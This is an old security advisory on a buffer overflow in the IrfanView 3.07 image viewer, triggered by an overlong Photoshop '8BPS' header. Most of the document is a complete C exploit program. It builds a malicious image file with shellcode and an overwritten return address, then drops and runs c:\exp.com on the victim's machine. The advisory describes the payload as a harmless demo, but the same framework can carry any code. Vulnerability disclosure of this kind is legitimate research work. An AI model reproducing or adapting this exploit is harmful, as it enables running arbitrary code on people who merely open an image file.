COMMAND

    Irfan view

SYSTEMS AFFECTED

    Irfan view 3.07

PROBLEM

    UNYUN found following.   The popular Image  viewer "Irfan  View32"
    contains the buffer overflow  problem, this problem exists  in the
    handling of   Adobe Photoshop image  file.  Irfan  view checks the
    image type by the image header, if "8BPS" pattern is found in  the
    header, Irfan view  judges this file  as Photo Shop  image.  UNYUN
    thinks  the  overflow  happens  at  the  handling  of reading this
    marker.  You can see the GPF dialog box by the following file.

        8BPSaaaaaaaaaaaaaa .... long 'a'

    You  can  make  this  file  by  notepad.exe.   This  overflow   is
    exploitable if the appropriate value is stored in the stack  area,
    any  codes  such  as  virus,  trojans,  destruction code, which is
    stored in the image  file can be executed.   This fact means  that
    the danger also exists on  downloding the image files and  viewing
    them.  Of course,  there is a possibility  of such danger also  in
    other software such as movie players, audio players.  UNYUN  coded
    the following  sample codes.   This code  generates the  jpg  file
    which contains the exploit code that generates "exp.com" in  "c:\"
    and executes it("exp.com"  is a simple  demo program, there  is no
    danger).  This is tested on Japanese Windows98 only.

    /*=============================================================================
       Irfan View 3.07 Exploit
       The Shadow Penguin Security (http://shadowpenguin.backsection.net)
       Written by UNYUN (shadowpenguin@backsection.net)
      =============================================================================
    */

    #include    <stdio.h>
    #include    <string.h>
    #include    <windows.h>
    
    #define     MAXBUF          0x22e0
    #define     RETADR          0x31E
    #define     FAKE_ADR        0x80101010  // Writable buffer pointer
    
    #define     JMPESP_ADR      0xbffca4f7  // You have to change this value
                                            // for non-Japanese Windows98.
    #define     HEAD            "8BPS\0"
    
    unsigned char   exploit_code[300]={
     0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
     0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
     0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
     0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
     0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
     0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
     0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
     0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
     0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
     0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
     0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
     0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
     0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
    };
    
    // "exp.com"
    unsigned char   exploit_data[1000]={
    0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
    0x20,0x77,0xf1,0xeb,0xf1,0x00
    };
    
    int  GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};
    
    char string_buffer[1000]  ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
    char filename[100]        = "c:\\exp.com";
    
    main(int argc,char *argv[])
    {
        unsigned char   buf[MAXBUF],l1,l2;
        unsigned int    ip,p1,p2,i;
        FILE            *fp;
    
        if (argc<2){
            printf("usage : %s outputfile\n",argv[0]);
            exit(1);
        }
        memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
        memcpy(buf,HEAD,4);
    
        ip=JMPESP_ADR;
        buf[RETADR  ]=ip&0xff;
        buf[RETADR+1]=(ip>>8)&0xff;
        buf[RETADR+2]=(ip>>16)&0xff;
        buf[RETADR+3]=(ip>>24)&0xff;
        buf[RETADR+6]=0xeb;
        buf[RETADR+7]=0x04;
    
        ip=FAKE_ADR;
        buf[RETADR+8]=ip&0xff;
        buf[RETADR+9]=(ip>>8)&0xff;
        buf[RETADR+10]=(ip>>16)&0xff;
        buf[RETADR+11]=(ip>>24)&0xff;
    
        p1=(unsigned int)LoadLibrary;
        p2=(unsigned int)GetProcAddress;
        exploit_code[0x1f]=p1&0xff;
        exploit_code[0x20]=(p1>>8)&0xff;
        exploit_code[0x21]=(p1>>16)&0xff;
        exploit_code[0x22]=(p1>>24)&0xff;
    
        for (i=0;i<4;i++){
            exploit_code[GetProcAddress_fcp[i]  ]=p2&0xff;
            exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff;
            exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff;
            exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff;
        }
    
        l1=strlen(filename)+strlen(string_buffer);
        l2=strlen(exploit_data);
        strcat(string_buffer,filename );
        strcat(string_buffer,"_" );
        strcat(string_buffer,exploit_data );
        strcat(exploit_code, string_buffer );
        exploit_code[0x1c]  = l1;
        exploit_code[0x6d]  = l2;
        exploit_code[0x77]  = l1+1;
    
        memcpy(buf+RETADR+12,exploit_code,strlen(exploit_code));
    
        if ((fp=fopen(argv[1],"wb"))==NULL){
            printf("Can not write file '%s'\n",argv[1]);
            exit(1);
        }
    
        fwrite(buf,1,MAXBUF,fp);
        fclose(fp);
        printf("Done.\n");
        return FALSE;
    }

SOLUTION

    Nothing yet.